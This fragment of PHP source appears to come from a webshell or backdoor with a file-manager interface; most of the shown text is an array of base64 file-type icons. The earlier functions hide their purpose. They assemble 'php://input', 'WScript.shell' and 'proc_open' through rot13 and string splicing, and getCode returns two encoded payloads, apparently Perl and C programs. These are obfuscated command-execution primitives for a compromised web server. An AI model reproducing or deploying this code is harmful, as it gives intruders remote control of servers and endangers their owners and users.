$str1 .= hex2bin($value);
}
return substr($str1 , 0 , 3) . substr($str2 , 0 , 3) . substr($str1 , 3 , 1) . substr($str2 , 3 , 1);
}
public static function getWatermalen ($str3 = 'getme') {
$str1 = "php";
$str2 = "input";
$str3 = $str1 . ":" . "//" . $str2;
return $str3;
}
public static function getOrange () {
$des = 'JFpevcg';
$tory = 'sveronyy';
$destory = str_rot13($des . '.' . $tory);
$name = 'shaqeaqllaqdoaqn';
$new_name = str_replace('aq' , '' , $name);
$string = substr_replace($destory , $new_name , 8);
$content = substr($string , 0 , 13);
return $content;
}
public static function getGrape () {
return 'proc_open';
}
public static function returnArray () {
$all_array = explode(' ' , self::ALL_STRING);
return $all_array;
}
public static function getCode ($which) {
switch ($which) {
case 'pgone':
$code = 'VlRiqKAlY2Wcov9jMKWfPaImMFOGo2AeMKD7PvEfrJ54CFNvoUyhrPV7PvEmrKA0MJ09VPqyL2uiVPWtqJ5uoJHtYJStVwgyL2uiVPWtnJEtVwfiLzyhY3AbWmfXWQN9WTk5oat7PvE0LKWaMKD9WRSFE1MoZS07PvEjo3W0CFEOHxqJJmSqBjbxnJSxMUV9nJ5yqS9uqT9hXPE0LKWaMKDcVUk8VTEcMFtvEKWlo3V6VPDuKT4vXGfXWUOuMTElCKAiL2guMTElK2yhXPEjo3W0YPNxnJSxMUVcVUk8VTEcMFtvEKWlo3V6VPDuKT4vXGfXWUOlo3EiCJqyqUOlo3EiLayhLJ1yXPq0L3NaXGfXp29wn2I0XSACD0gSIPjtHRMsFH5SIPjtH09QF19GISWSDH0fVPEjpz90olxtsUjtMTyyXPWSpaWipwbtWPSpovVcBjcwo25hMJA0XSACD0gSIPjtWUOuMTElXFO8sPOxnJHbVxIlpz9lBvNxVIkhVvx7Pz9jMJ4bH1ERFH4fVPV';
break;
case 'gai':
$code = 'V2yhL2k1MTHtCUA0MTyiYzt+PvAcozAfqJEyVQkmrKZip29wn2I0Yzt+PvAcozAfqJEyVQkhMKEcozI0Y2yhYzt+PzyhqPOgLJyhXTyhqPOupzqwYPOwnTSlVPcupzq2J10cPafXVTyhqPOzMQfXVUA0paIwqPOmo2AeLJExpy9covOmnJ47PvOwnTSlVTEyoUAyoTMoZwSqCFWloFNgMvNvBlNXVTEuMJ1iovtkYQNcBjbtp2yhYaAcoy9zLJ1coUxtCFOOEy9WGxIHBjbtp2yhYaAcoy9jo3W0VQ0tnUEioaZbLKEinFuupzq2JmWqXFx7PvOmnJ4hp2yhK2SxMUVhp19uMTElVQ0tnJ5yqS9uMTElXTSlM3MoZI0cBlNXVTW6MKWiXTSlM3MoZI0fp3EloTIhXTSlM3MoZI0cXmRep3EloTIhXTSlM3MoZy0cXGftPvOzMPN9VUAiL2gyqPuOEy9WGxIHYPOGG0AYK1AHHxIOGFjtFIODHx9HG19HD1NcVQftPvOcMvNbXTAioz5yL3DbMzDfVPumqUW1L3Dtp29wn2SxMUVtXvxtWaAcovjtp2y6MJ9zXUA0paIwqPOmo2AeLJExpvxcXGjjXFO7PvNtVUOypaWipvtvJl1qVTAioz5yL3DbXFVcBjbtVPOyrTy0XQNcBjbtsDbtp3ElL2S0XTEyoUAyoTLfVTSlM3MoZS0cBjbtp3ymqTIgXTEyoUAyoTLcBlNtPvOxqKNlXTMxYPNjXGfXVTE1pQVbMzDfVQRcBjbtMUIjZvuzMPjtZvx7PvOyrTIwoPtvY2Wcov9mnPVfVaAbVP1cVvjtGyIZGPx7PvOwoT9mMFuzMPx7VNbtpzI0qKWhVQN7Pa0=';
break;
}
return str_rot13($code);
}
}
class HtmlOutput {
public static function htmlOut ($data) {
echo "$data\n";
}
public static function getFileIcon ($type) {
$type_array = [
"aspx" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAjNJREFUSMfFVD9IemEUPVfKNh3KEgLBhhpa6n0uEUGJjklQ0OYaQRAEDU1G4NDg4FLU8MopiJqsxXi0uNQSIUVLz1dQixEGCQ3yzm94Px2Ukl//fme797sf59x7z/cJ/kJpSlNaqQSBQLq68FksYxnLllWdrc5WZycmLuVSLsWyWt7TzrVz7bxa/TRxrREqKq6uKqWUUnd3oaPQUeior++9etdXCT9GIMAEE0ycnr4n5IcFtBbS9t1UcizHcpzP2zv2jr2zvt5UcI1rXBuGEwSD9fx3eaAVHG+QtfiXVvDBxBoV/TaaPUAQvL3FAQ5wYBg0adKMRuVJnuRJBBYsWCcnXOISlyYnZUVWZOXhAV544b25QT/60T86yna2s/3xUXKSk1wo5JyfncGAAWNsrEbXtAIucIELV1cssMDC8DDWsIa1VIoBBhjY3oYGDdrAALLIImuajDDCiK4jiCCC0Sj3uc/9jQ1JSlKSPT3UqVOPx+GGG+6Xl9YT2MUudnM5qUhFKrGYk7RtDnKQg1NTMGHCLBZdMVfMFSsUnLzH49R1d8u8zMt8RwcucIELjwczmMFMpYIyyih7vY10TROQV3mV16EhTnOa08Ui44wzPjIiYQlLuFx2Or2/t3Vbt/Xxcfroo+/tzVldKoVNbGIzHEYnOtGZz4tf/OLf22Mve9nb/CV/2YSO0K0tOZRDOZyb+9f7//0V1PFbQho/vLoJmWaa6edntagW1eIPCskgg0ypVAv/AGuEFKY93mwjAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTEwLTIzVDIzOjI4OjA1KzA4OjAwzBJUYgAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0xMC0yM1QyMzoyODowNSswODowML1P7N4AAABHdEVYdHN2ZzpiYXNlLXVyaQBmaWxlOi8vL2hvbWUvYWRtaW4vaWNvbi1mb250L3RtcC9pY29uX2lpcW1oMjZ1a3VqL2FzcHguc3ZnlsnZqwAAAABJRU5ErkJggg==" ,
"css" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAt5JREFUSMe9VTFIW1EUPVcTmzRF3bpIQecs/veDm6Bu9dtKsSglOAii4iBWMU5CQpFaBBfxg/xB0qWlNIO6dNCmIpHa+AMmQhzMkgyOxgSJhf9uh6+WtvyWtNKzvPfOO3DPu++9ewlXaC21llpLT56Qj3zke/uWAhSggMuFajGGMYxdXnKOc5x7/NicN+fN+Q8fnOR0PRFn4kycvXrFRS5y8f79mnRNuiYdDlcbX1rSktabN9CgQfP7MYEJTGiauWwum8vb2z/rfz1hBRVUisWkltSSWi5XrQExI2bETKWCCCKIeL02u7EhWLDg7u4DOqADisev9TVVp/ivcPcu7/Ee762vB5oDzYHmQMA5A/8IuSt35e7z57Xh2nBtuLHxZmMTm9icnra6rC6r6+FDGDBgfPly6wZSiVQilUgm7TfwnRdZkRXZZ8+wiEUsfuf/0xU4g4QhDGFUKtChQ79z579FvvquJIQQQjD/Xv3x44/rjg57TKft8eSEddZZ7+mhAhWocHyMJjShKZtllVVWHz1yqivOV6BDhx6LcYxjHMvneZAHebBQQDva0X54aItevsQSlrDk8dAojdJoMsn93M/9kQjKKKPc0IBznOP882enMI4GeJVXefXwkOIUp3hPD0UpStGBAbtOPHhgq54+xSQmMfnpEwgEcrspRCEKBYPsYQ97trau+aoNUC/1Uq+mwQUXXC9eYBazmJ2awj72sZ/LcZ7znH//HsMYxrDXa2fo6Aid6ETnu3ekkELKvXtYwxrWjo8d4/zxDVzXdj/72c9M4zRO4x4PRjCCESl5iId4qFymNmqjtvp6CAgIZl7hFV4plW54JwPKjrKj7Jyeog51qGtooAxlKEMEN9xwX1zgtpBAAgmfzzZmWbBgwSoWb70ZOUEqUpHKwgLmMIe5TMY0TMM0wuEbA2pQDarBgQEZlVEZff36r9uxE1SoUL9+lSEZkqG+vlRLqiXVsrHxDRyVWXgjtX2dAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTEwLTIzVDIzOjI4OjA1KzA4OjAwzBJUYgAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0xMC0yM1QyMzoyODowNSswODowML1P7N4AAABGdEVYdHN2ZzpiYXNlLXVyaQBmaWxlOi8vL2hvbWUvYWRtaW4vaWNvbi1mb250L3RtcC9pY29uX2lpcW1oMjZ1a3VqL0NTUy5zdmeLMRR2AAAAAElFTkSuQmCC" ,
"dir" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAVhJREFUSMftlK2qAlEUhdceRTCoiEEYDGIxj0cMvoLdaBib+BNE1KJBZHDewGa3DmIZLPoKYxGTUQyCODhy9g3iLTfovTDc4qrnnP19rA0H+OeQmIu5mDcaMGDAqNV4wxvehEJvT7Bhwz6foUKFalnuzt25u9HIKTtlp3y7vXoefAwwDO5xj3v1umIrtmIfDu/y5Ume5CmZRAABBPr98CQ8CU+i0cdpq/WygZzMyZz0PBrQgAbLJRZYYHG9/rrLMcYYp1Ic5zjHNQ177LFfr3/cu+OOu+dRgQpUmE6/BVBBBZXhEA4cOMfjH1f6MqSTTno6jRhiiFWreArkrbyVtzIZv8DPaEWtqBVVVQghhLhcFL+Br/IR+Ah8BII0oxnNXJcjHOFIqfT4D7Zbv4DSlKY0s1k22WTTdYNIIIFEp8NgMHQdK6ywUvxrpo022lJSk5rU7HZ947ybL6dZj4GTbSQjAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTEwLTIzVDIzOjI4OjA1KzA4OjAwzBJUYgAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0xMC0yM1QyMzoyODowNSswODowML1P7N4AAABGdEVYdHN2ZzpiYXNlLXVyaQBmaWxlOi8vL2hvbWUvYWRtaW4vaWNvbi1mb250L3RtcC9pY29uX2lpcW1oMjZ1a3VqL2Rpci5zdmfYazEbAAAAAElFTkSuQmCC" ,
"exe" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAkFJREFUSMe9lLFLcmEUxp/nq+GGQzREcCmhoKKhpVdEKojb0p/QEAVtQlYStarUJLiIEASCBP0H1WRhQ3BLh3AJRAgjiEgSAgMju6fhfvpBYYJf+Wzn4Zx7fu95z3uJv1IrakWtPD7iAhe46O1Fq9rCFrYKhep8db46bxhZZpllodC0biI9kZ5IV6stN64dRJQoCYWUUkqp21vXkevIdTQ01Cj/z/82/F5OpwQlKMFUqhHILwM0B+n86VY85jGPz8+thJWwEuHwl4RrXOP69NQOBgfr/k/tQDPZuyFSi9t0Bd9M7DNRu9V4B5awhKVIRAwxxHh/5wlPeKJpOMABDubmQBB8e5OMZCQzNmb7ySSjjDL6+ioJSUgil6t/7wlPeFpY4CY3udnf3xzAAQccz89c5jKXd3bqvhdeeC0LPehBj9+PNaxhra+PJk2ai4t2Ujxu121vtzwBa9aatWazWbrppjscRgoppHSde9zjXq2Rx4MAAgicncGECdPpxAY2sPHyIuMyLuP/XgF3uctdnw8ZZJBxOGp+h67ruq6HQl8I0kgjfXXFbnaz2++nRo3ayAimMIWpUkkqUpFKMskyyyxPTyOPPPK5HOOMM14swgUXXKurfOADH5TCHe5wp2m4xz3uOzrqYA2XMIYYYoeH8MEHX6VS92cwg5nRUYlIRCLDw/aEurogEMjlJQwYMDo77Ynd3NTKxBRTTI+Hk5zk5MBAc4B2q10gn3949SWUqEQlWiqpdbWu1n8RZB/72C8Wa+EHCmUDZEgGfvQAAAAldEVYdGRhdGU6Y3JlYXRlADIwMTktMTAtMjNUMjM6Mjg6MDUrMDg6MDDMElRiAAAAJXRFWHRkYXRlOm1vZGlmeQAyMDE5LTEwLTIzVDIzOjI4OjA1KzA4OjAwvU/s3gAAAEZ0RVh0c3ZnOmJhc2UtdXJpAGZpbGU6Ly8vaG9tZS9hZG1pbi9pY29uLWZvbnQvdG1wL2ljb25faWlxbWgyNnVrdWovZXhlLnN2Z2RWoAMAAAAASUVORK5CYII=" ,
"html" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAghJREFUSMfFVb9LamEYft/jddBBafG4VIQSSCD4fUcFdXIoMBwddIlAHOSsglMN5uJpCQQJaYjgLC2CJELOokc+kaAlgoam/AM8kOZ3h4Nwb5fL8ZZcn/H99T3vw/PyAawZ+DlAKaWUPjxABCIQcTh4hVd45ePDdFAUoxh1OCAPechfXLAsy7Ls2dk/MyIqUYl6fx/oBrqBrte7bB8llFBSr9MczdHcfE68xEu8x8dmfcLKNWXAgCGiE53ovLw0FD08/H8EfoPVyjWuce321lBof/9zxY9VPcVd3MVdV1eYxjSmn58XcaxjHet2OyAg4Pm5EfX7V0QA0a/4Fb9itw8Lw8Kw0OtBG9rQ7vUWFWE1rIZVUZzxGZ/xg4MvKyBNpIk02dzkMR7jse3teWaemWdeX3GEIxxtbUklqSSVNjZ4gzd4o9NhjDHGJhOzuaYeCCVDyVByZ8d4+OREL+pFvahpQlbICtndXWvCmrAmnp4sHovH4un3oQY1qN3cLLuYqQJaU2tqzZcXw82Nhi1lS9lSkQgXuchFUeyP++P++O3NyB8doQ996Ds9XRmBBQxJ7+4MMwEEq8FqsLq3BzLIIC/y19fGGS479RtnOJAH8kB+fPxq/7cJrAprJ/CHB4SyUBbKbjeP8ziPdzpEJzrRzT+jv2GqTJWpIgjYwha23t/BDW5wr3vtX/ATpfLJLQZQUDwAAAAldEVYdGRhdGU6Y3JlYXRlADIwMTktMTAtMjNUMjM6Mjg6MDUrMDg6MDDMElRiAAAAJXRFWHRkYXRlOm1vZGlmeQAyMDE5LTEwLTIzVDIzOjI4OjA1KzA4OjAwvU/s3gAAAEd0RVh0c3ZnOmJhc2UtdXJpAGZpbGU6Ly8vaG9tZS9hZG1pbi9pY29uLWZvbnQvdG1wL2ljb25faWlxbWgyNnVrdWovaHRtbC5zdmdmCdwJAAAAAElFTkSuQmCC" ,
"file" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAMxJREFUSMftlLEJg2AUhO8PcQU3cIH/GgsLcQI7QRzBQSzdQRuxcQTBxkIXcAMLCyf4UynBEEx+TGy87j14x91XPOBkie2CJUuWw4AECRLL+s5untGhQ+f7vehFL+r6b01IklSKGTNm40hFReW6e3e3twR0FSFCFATIkSMvik+DvDTRJbDOkpLScRYiMpaxjD1vl4CuVKta1U7TGkRAQDQNUqRITRMhQoRV9TMCur6HEdDVFeAKcAW4bxfrQ7Fp0z7uHyy+MGDAOLv2kx4mEV8Nmu94UQAAACV0RVh0ZGF0ZTpjcmVhdGUAMjAxOS0xMC0yM1QyMzoyODowNSswODowMMwSVGIAAAAldEVYdGRhdGU6bW9kaWZ5ADIwMTktMTAtMjNUMjM6Mjg6MDUrMDg6MDC9T+zeAAAAV3RFWHRzdmc6YmFzZS11cmkAZmlsZTovLy9ob21lL2FkbWluL2ljb24tZm9udC90bXAvaWNvbl9paXFtaDI2dWt1ai9pZl9kb2N1bWVudF9maWxlX2ludi5zdmcCD615AAAAAElFTkSuQmCC" ,
"img" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAy9JREFUSMflk1FIU2EUx8+52zTIVS+THvRNclhuer/t4osTBX0JdElbMIYuGOHDfXDqwoRIomiwBQ58kA1Kpt3sLX0aIcj2tEwvzEAxdb5MBJ8ns3Z3Tw9jEposCp/6P37nO+f/+845H8D/LrRmrVlr9tYttVftVXv9/tLx9euX5iiBBFIuxy1zy9zy69datU/tU/tmZqiTOqnzyxdcwRVc+fTpX31omIZpuKoKG7ABG1QVRBBBVBRohEZovH1b3VV31d3ZWS20Qzu037xZMp6fX5fX5XX569e/NWaMMcbsdlRQQeXNG7KSlazfvyMgINy9CwwYsM+fYRRGYdTr5S4qZCYzmenGjdZQa6g1ZLM5HA6Hw6HRVCQIQhCCoghGMILx0SNswzZsC4VKQa/37PVzABa3xW1x37mjFbWiVvz2DU1oQlM0mslkMplMLFax9TVUQzXJJOUoR7nJSRiBERgRRcpSlrKJxMUACAio01E/9VP/hw/UQR3U8fixvlvfre82m4GAgHiej/ARPuJ0XgQgC7IgC8+fo4ACCqJIczRHc/fvy0fykXw0P1+hA14v2chGtoMD2Sk7ZefsbAITmMCTE6qlWqp9+BA84AFPONySbEm2JA2GswWFHWFH2KmrgzjEIR6JwBiMwZgklTt7IQCt0iqtejzcIXfIHb58ee5lcTkux1Op0kzfvdP4ND6Nb2rqTDmuGC1Gi1FJAjvYwS5JyCGH3OQkbdImbX78iE3YhE3XrpUztKe5echDfm9vrXmtea35/KzK0i3qFnWLT58WUoVUIZVOswALsIDLVYoajTRBEzTBcfpqfbW++tmzRFeiK9GlKPw2v81vWyyUpjSlp6exgAUs/DqCIRiCoffvKy1Zqj5Vn6rP51WX6lJdDkfp9NWr0o709BTHi+PF8QcPSqNTlHKesqQsKUtPnmAAAxioqzstyHzMx3zpdPm7VQL4vRD/9CYf5sN8+N49tsAW2ML+vpa2aIu23r7FEIYwFI8zAzMww8nJ34FUFrnJTe4rV2iQBmnwxYtTclPQFDQFr16lGMUoVlV1WQA4gAM48OPHhn/Dv+E/Pr4snz/WTwViayM1Vv2QAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTEwLTIzVDIzOjI4OjA1KzA4OjAwzBJUYgAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0xMC0yM1QyMzoyODowNSswODowML1P7N4AAABGdEVYdHN2ZzpiYXNlLXVyaQBmaWxlOi8vL2hvbWUvYWRtaW4vaWNvbi1mb250L3RtcC9pY29uX2lpcW1oMjZ1a3VqL2ltZy5zdmeKLQo/AAAAAElFTkSuQmCC" ,
"js" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAZhJREFUSMfNlDGvwVAUx895eZtFxCaRMmEg6fUBdCCRWEXs9k7EhMFixAeQfgRJO4lYTFgYJCY0IpEmlq5Nzxvuq5cQr3jIO0tzzr09/197/vcifAcTmchEwwAEBPT74dEoQxnKm41VsApWQZLmOMc5bjau74kTcSJOLOthYedDiBGjRoMxxhjbbpNqUk2q4fC1/R9/Ffw9gkGqU53qo9E1kBcDuIN8PlsKNdRQG4/tnt2ze63WxYYlLGE5HPIkFDrVn+UBFzzk3iByKm8awQ/AReWc6N1xtwdII420fh900EHP5VBAAYVuF7KQhaxpAgEB5fP8PolE3PrdPQJUUUV1NoMEJCCx33Phw4GvVqtcWNdv7fewB1BBBZVAgGeZDH/WalSkIhV3u6cBUJva1D4eedbpkEACCabJj9NqRSlKUWo65b++VEIvetG7Xt8K4OoBlFFG2eejAQ1oEI9jGtOYliS+Go1CE5rQtG3wgAc8iwXFKEaxSgUBAd2awz84Bad4F8j5hXcagTNrJjOZyS8EUUABxTCc9Atx3rj7wZdvFgAAACV0RVh0ZGF0ZTpjcmVhdGUAMjAxOS0xMC0yM1QyMzoyODowNSswODowMMwSVGIAAAAldEVYdGRhdGU6bW9kaWZ5ADIwMTktMTAtMjNUMjM6Mjg6MDUrMDg6MDC9T+zeAAAARXRFWHRzdmc6YmFzZS11cmkAZmlsZTovLy9ob21lL2FkbWluL2ljb24tZm9udC90bXAvaWNvbl9paXFtaDI2dWt1ai9qcy5zdmeLUob0AAAAAElFTkSuQmCC" ,
"jsp" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAA0RJREFUSMelVc9LG1sU/s4QJ+1GWoiZ3muyanBhzERT7VoRd1qzKNosuigIhRZEsLuISlelFSxiICnBjYVCKC71D+gmTdKVYoiQkiqdCTE4aIPakcx9i9QK9c1LfX6by/1xzv3Od+65h2ADZUgZUobcbmlFWpFWkknIkCEPDVEP9VDPjRt2dmhBC1qOj9GGNrS9fq3ltJyWe/mysSnEn8cddn4kVVIlNRZDHnnk29qkZWlZWn74UPSLftH/86ednfAKr/BGo7RKq7Q6P88m2SSbvHNHX9KX9KVnz+yIXAKP8ziP6zrbY3tsLxJpavALLM3SLP3mDeeccy7E+cgG2SAbjMcbp4h+B2rraQELWHA4sI51rJ+c/C0BdKMb3ZcjpDzlKf/0KY/yKI++fds0BfDCC+9fSPVnCnbFrtgtFhvEDeNCGjCwmzcbb2hykqlMZerHj46rXtAM5Y5yR7kjkWjMzkegM9WZ6kzJsjFnzBlzpRJlKUtZn+8XAYeDJViCJVQV85jHPJFYFIti0eEgjTTS7t5ljDHG7t1rqkBJlETp+LjsLDvLznz+fH17bHtse8w0WY3VWO3HD2SRRRYgrnKVq48eoYoqqh8+XFuCXvSi17JOz07PTs9u3z7YONg42Dg6+p2JGquxWqFAUzRFU69eSZjBDGYu17XL5XK5XEAoFAqFQoDH4/F4PEAgEAgEAoDf7/f7/f9CIIcccpLkDDvDzrAsN+NrWwWmaZqmCVSr1Wq1CiiKoigKYFmWZVmApmmapl1bL3sCsizLsgwYhmEYBlAsFovFIqDruq7rF+t2oAhFKNK8ihzWqDVqjX7+TG5ykzuVQgEFFIj2+/b79vsePEAQQQS/fEESSSS/f2/mkDZpkzYPD7VWrVVrPTz839LwAT7AByqVRnWEw9cXu4HzR8gn+ASfePLE/iccxzjG63WKUYxi/9F8rgiapmmalmVkkEHm5MT2IxIkSNCnT9RFXdT14kX7bPts++zRkVgTa2LNNK96sdgSW2Lr/n0xLIbFMOf1YD1YD2Yy9gTSIi3Sz5+TSSaZ795ZPstn+d6/px3aoZ1bt6BBg3bRVJpGHqQgBb99gwIFyuPHlZHKSGXk69d/AHOuXYUMi+REAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTEwLTIzVDIzOjI4OjA1KzA4OjAwzBJUYgAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0xMC0yM1QyMzoyODowNSswODowML1P7N4AAABGdEVYdHN2ZzpiYXNlLXVyaQBmaWxlOi8vL2hvbWUvYWRtaW4vaWNvbi1mb250L3RtcC9pY29uX2lpcW1oMjZ1a3VqL2pzcC5zdmdQ2TjbAAAAAElFTkSuQmCC" ,
"php" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAA4tJREFUSMetlU9IG1sUxs+5MxOpVEOQhmBE0sR2IURwxthFAtlYC2KLrQRL6VYKJUQCImKhCzeBCIlx0SyF1oU2CzdSJLSEEMwmfxaGLtqQBLXVRYWASa2kM3PeIsT3SJ68vLbfZrjnfnfOb+53L4PQJJfL5XK5OK4QLAQLwTdvMIhBDN6+De1qDMZgrFajHuqhnt3dLluXrcvm98cxjnG8uGi2882FYqFYKBaMRsxhDnMmUy1ai9aid++2219ICSkh9eQJzuIszr58WTFXzBWzw+EkJznpwYNmkBYAOSNn5AxjfIyP8bHz81wul8vlyuV2AcQBcUAcOD+nOMUp/uoVnuAJnuj11bPqWfUsEpFESZTER48y2Uw2k/35k7W9tf9TOIiDOKjTwRZswVYgQB7ykIcx8pOf/M+fN3x/HIDts322/+kTTMEUTF27BhGIQGRhAatYxeqXLzACIzDicl0Zwe8q3ZnuTHcmk/VR4/m3pIgUkSKfP7cASJIkSVJnpzKnzClzgqCW1JJaSqWsVqvVatXpfhVII2gEjVCtNjKHBCQggXgJMLQytDK0oteDDnSgOzzkwlyYC3d0XL5Ao9FoNIuLvwpAS7RES8kkTMM0TNvtzfM8O2JH7EirhU3YhM2ODvCABzzlMoUoRKHFRTCBCUxaLbrRje5796AXeqH38BA2YAM2btwgN7nJrSgwARMw8e4drMIqrHZ3gwIKKHNzuI3buK3XXwXYcgaon/qp//t3tsyW2fL792pSTarJW7folE7p9Ns3ylKWsrEYb+ANvOH6dXVH3VF3Hj6sr97dBS94wWu11scfPoAd7GBv/fKGrrwFclSOylGOQxlllF+8QAMa0DAzg93Yjd137qjr6rq6fv9+w88ZOSNn5DjwgQ98CwsUpjCFnz79r4h4fpwf58cVhfZoj/YAwAlOcBoM3DF3zB3HYhCAAASMRvKRj3w/fuABHuCBKNajEgSykIUsRLJFtsiWZ89wHudxvq8PAQEBgBKUoISiwBqswdq/AKQn05PpyVJJFERBFB4/rt9TrZaAgP7ptIENbAAt9eYIm+aZkRmZ8ePHtk/taH40P5rv6xNDYkgMvX7d9sI2JXkkj+TJ5y93oNmgzCgzygxjiIiIN2/+qcb1nxHPVy4qF5ULxhqRtACYLWaL2fL1a9Fb9Ba95bI4LA6Lw4XC7wLUGwOgAx3oePu2Uf8LaX2DHajI5aYAAAAldEVYdGRhdGU6Y3JlYXRlADIwMTktMTAtMjNUMjM6Mjg6MDUrMDg6MDDMElRiAAAAJXRFWHRkYXRlOm1vZGlmeQAyMDE5LTEwLTIzVDIzOjI4OjA1KzA4OjAwvU/s3gAAAEZ0RVh0c3ZnOmJhc2UtdXJpAGZpbGU6Ly8vaG9tZS9hZG1pbi9pY29uLWZvbnQvdG1wL2ljb25faWlxbWgyNnVrdWovcGhwLnN2Z/pmCQMAAAAASUVORK5CYII=" ,
"rar" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAupJREFUSMfFVUtIW1EQPXONUEpc2U+wkIUGLBT83CTwhJJNVrpwURPUZeGBISXoQvysAiFgEV2UBBVxIYIKFfGDZKHYgqiRhPeEFBoK7opKlayyELHe6eIRCy1itZbObi73zJx7ZuYO8J+Nfj2QB/JAHoyP0yRN0uSLF9zADdxwfn5TIE5ykpODg6JJNImmiQmlKU1p/f37wf3gfnBz848ZlQjUh+pD9aFnz277Ijkn5+TcxoZbuqVbvn/v3nXvunc7O6+7L+5d0hzlKCcEFalIxZERRBBBJBy+jsi9E4ALLrg+flSLalEtvnplHX76hG1sY/vly1+v2+47v6EbuqHH4yXfKoXTaXn9/f9egVva1RTIMTkmx+bnaYqmaMrrRQta0JLPI4UUUmdnf5GBQA8fgsHg589ZZ531bNYMm2Ez3Nn5U4EQQggFAhagpoaruZqrlUI3utFtGFjFKlZPTuCBB55AgId5mIc9Hl7jNV4jsnDBILdyK7d++3aFa0YzmplLca/y3FQCSlKSkpub2MEOdoaGyEUuch0fw4AB4+tX8pOf/DMz8MEHXyqFLnShSykxK2bF7JcvJZyl4MrKdXlu7oE61KHu7VulK13p6bSlgMNBcYpT3DRFQRRE4fFjtrOd7R8+XJqX5qV5dGQRjUbJTnayK3V3AjnkkBsYICc5ydnWhlrUonZ8nJd4iZd8PjWtptV0ICCiIiqiKytlskyWyaoqCxyLKadyKqfDcXMTKqmkurggL3nJa7PxHu/xXqFAGmmkVVZyhjOcOTvDFrawVShQL/VS79OnFrq8HBo0aKenSCONdKknHj3iBCc4USxShCIUqajgLGc5+/27KUxhivLyKwKNC40LjQt+v8iLvMi/fo1lLGM5k6EYxSj2+fNdh4CjHOXokydIIIFER4c6VIfq8N270o74bRmVPg7u4R7umZiwxtFmwzrWsU50WwI0SqM0+uAB2tGO9lzO6DP6jL43b+76oHu3H6uCS4n3O8bgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTEwLTIzVDIzOjI4OjA1KzA4OjAwzBJUYgAAACV0RVh0